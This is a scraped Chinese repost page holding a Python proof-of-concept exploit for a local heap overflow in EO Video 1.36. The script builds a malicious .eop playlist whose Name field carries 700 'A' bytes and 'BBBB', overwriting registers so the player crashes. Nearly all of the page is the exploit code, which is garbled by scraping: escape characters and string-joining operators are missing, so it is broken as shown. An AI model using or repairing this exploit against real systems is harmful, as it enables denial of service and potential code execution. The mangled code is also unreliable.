欢迎来到福编程网,本站提供各种互联网专业知识!

EO Video 1.36 Local Heap Overflow DOS / PoC

发布时间:1970-01-01 作者:佚名 来源:互联网
#!/usr/bin/python#--------------------------------------------------------------#EOVideov1.36HeapOverflowlocalPoC/DoSexploit#*.eopplaylistfilein<Name>bufferoverflow#Otherversionsmaybevulnerabletoo...#-
#!/usr/bin/python

# --------------------------------------------------------------

# EO Video v1.36 Heap Overflow local PoC/DoS exploit

# *.eop playlist file in buffer overflow

# Other versions may be vulnerable too...

# --------------------------------------------------------------

# Vulnerability discovered and coded by Muris Kurgas aka j0rgan

# jorganwd [at] gmail [dot] com

# --------------------------------------------------------------

#

# Who uses this crap of player anyway? :)

# --------------------------------------------------------------

# EAX 42424242

# EDX 42424242

# -------------------------------------------------------------- import os bafer = 'x41'* 700 'x42' * 4 print "Spit me out, all bright and shiny! :)"

fileHandle = open ( 'plejlista.eop', 'w' )

fileHandle.write ('nnnnneston1n ')

fileHandle.write ('nnneston1nnnn ')

fileHandle.write ('' bafer '')

fileHandle.write ('0n0nn-1n-1nn ')

fileHandle.write ('30216n0n ')

fileHandle.write ('nnn')

fileHandle.close ()

相关推荐